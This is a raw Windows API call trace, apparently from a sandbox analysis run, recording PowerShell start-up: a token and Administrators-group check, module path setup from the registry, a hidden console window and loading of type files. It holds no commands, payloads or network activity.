[0076.845] GetVersionExW (in: lpVersionInformation=0x10d620*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10d620*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0076.847] GetCurrentProcess () returned 0xffffffffffffffff
[0076.847] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x10d6b8 | out: TokenHandle=0x10d6b8*=0x324) returned 1
[0076.849] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10d5d8 | out: TokenInformation=0x0, ReturnLength=0x10d5d8) returned 0
[0076.849] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x194610
[0076.849] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x194610, TokenInformationLength=0x4, ReturnLength=0x10d5d8 | out: TokenInformation=0x194610, ReturnLength=0x10d5d8) returned 1
[0076.850] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x10d738 | out: phNewToken=0x10d738*=0x320) returned 1
[0076.850] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10d5d8 | out: TokenInformation=0x0, ReturnLength=0x10d5d8) returned 0
[0076.850] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x194640
[0076.850] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x194640, TokenInformationLength=0x4, ReturnLength=0x10d5d8 | out: TokenInformation=0x194640, ReturnLength=0x10d5d8) returned 1
[0076.851] CheckTokenMembership (in: TokenHandle=0x320, SidToCheck=0x2cfe520*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x10d748 | out: IsMember=0x10d748) returned 1
[0076.851] CloseHandle (hObject=0x320) returned 1
[0076.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0077.006] SetConsoleCtrlHandler (HandlerRoutine=0x27e677c, Add=1) returned 1
[0077.030] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.030] CoTaskMemFree (pv=0x229db0)
[0077.031] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.031] CoTaskMemFree (pv=0x229db0)
[0077.354] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.354] CoTaskMemFree (pv=0x229db0)
[0077.364] GetConsoleWindow () returned 0x10230
[0077.364] ShowWindow (hWnd=0x10230, nCmdShow=0) returned 0
[0077.392] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
[0077.392] CoCreateGuid (in: pguid=0x10d830 | out: pguid=0x10d830*(Data1=0xd5fcaf58, Data2=0x2c89, Data3=0x45d4, Data4=([0]=0xae, [1]=0x35, [2]=0xc8, [3]=0xc5, [4]=0x31, [5]=0x32, [6]=0xc0, [7]=0xcc))) returned 0x0
[0077.406] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.406] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.406] CoTaskMemFree (pv=0x229db0)
[0077.431] WinSqmIsOptedIn () returned 0x0
[0077.432] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.432] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.432] CoTaskMemFree (pv=0x229db0)
[0077.438] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.438] CoTaskMemFree (pv=0x229db0)
[0077.439] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.439] CoTaskMemFree (pv=0x229db0)
[0077.449] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.449] CoTaskMemFree (pv=0x229db0)
[0077.451] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.451] CoTaskMemFree (pv=0x229db0)
[0077.462] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.462] CoTaskMemFree (pv=0x229db0)
[0077.463] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.463] CoTaskMemFree (pv=0x229db0)
[0077.466] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.466] CoTaskMemFree (pv=0x229db0)
[0077.467] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.467] CoTaskMemFree (pv=0x229db0)
[0077.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.596] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.596] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
[0077.596] CoTaskMemFree (pv=0x229db0)
[0077.597] CoTaskMemAlloc (cb=0xcc) returned 0x211520
[0077.597] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x211520, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
[0077.597] CoTaskMemFree (pv=0x211520)
[0077.597] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d3a8 | out: phkResult=0x10d3a8*=0x328) returned 0x0
[0077.597] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10d32c, lpData=0x0, lpcbData=0x10d328*=0x0 | out: lpType=0x10d32c*=0x2, lpData=0x0, lpcbData=0x10d328*=0x6c) returned 0x0
[0077.597] CoTaskMemAlloc (cb=0x70) returned 0x1bfd60
[0077.597] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10d2fc, lpData=0x1bfd60, lpcbData=0x10d2f8*=0x6c | out: lpType=0x10d2fc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x10d2f8*=0x6c) returned 0x0
[0077.597] CoTaskMemFree (pv=0x1bfd60)
[0077.597] CoTaskMemAlloc (cb=0xcc) returned 0x211520
[0077.597] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x211520, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
[0077.597] CoTaskMemFree (pv=0x211520)
[0077.597] CoTaskMemAlloc (cb=0xcc) returned 0x211520
[0077.597] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x211520, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
[0077.597] CoTaskMemFree (pv=0x211520)
[0077.599] RegCloseKey (hKey=0x328) returned 0x0
[0077.599] CoTaskMemAlloc (cb=0xcc) returned 0x211520
[0077.600] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x211520, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
[0077.600] CoTaskMemFree (pv=0x211520)
[0077.600] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d3a8 | out: phkResult=0x10d3a8*=0x328) returned 0x0
[0077.600] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10d32c, lpData=0x0, lpcbData=0x10d328*=0x0 | out: lpType=0x10d32c*=0x0, lpData=0x0, lpcbData=0x10d328*=0x0) returned 0x2
[0077.600] RegCloseKey (hKey=0x328) returned 0x0
[0077.676] CoTaskMemAlloc (cb=0x20c) returned 0x23f220
[0077.681] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x23f220 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
[0077.682] CoTaskMemFree (pv=0x23f220)
[0077.682] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x10cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
[0077.683] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
[0077.691] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.691] CoTaskMemFree (pv=0x229db0)
[0077.692] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.692] CoTaskMemFree (pv=0x229db0)
[0077.712] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.712] CoTaskMemFree (pv=0x229db0)
[0077.712] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.712] CoTaskMemFree (pv=0x229db0)
[0077.716] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d198 | out: phkResult=0x10d198*=0x330) returned 0x0
[0077.719] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x10d1ac, lpData=0x0, lpcbData=0x10d1a8*=0x0 | out: lpType=0x10d1ac*=0x1, lpData=0x0, lpcbData=0x10d1a8*=0x74) returned 0x0
[0077.720] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x10d11c, lpData=0x0, lpcbData=0x10d118*=0x0 | out: lpType=0x10d11c*=0x1, lpData=0x0, lpcbData=0x10d118*=0x74) returned 0x0
[0077.720] CoTaskMemAlloc (cb=0x78) returned 0x1bfd60
[0077.720] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x10d0ec, lpData=0x1bfd60, lpcbData=0x10d0e8*=0x74 | out: lpType=0x10d0ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x10d0e8*=0x74) returned 0x0
[0077.720] CoTaskMemFree (pv=0x1bfd60)
[0077.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x10ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
[0077.720] SetErrorMode (uMode=0x1) returned 0x1
[0077.720] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x10d070 | out: lpFileInformation=0x10d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0077.742] SetErrorMode (uMode=0x1) returned 0x1
[0077.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.742] SetErrorMode (uMode=0x1) returned 0x1
[0077.742] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d070 | out: lpFileInformation=0x10d070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
[0077.772] SetErrorMode (uMode=0x1) returned 0x1
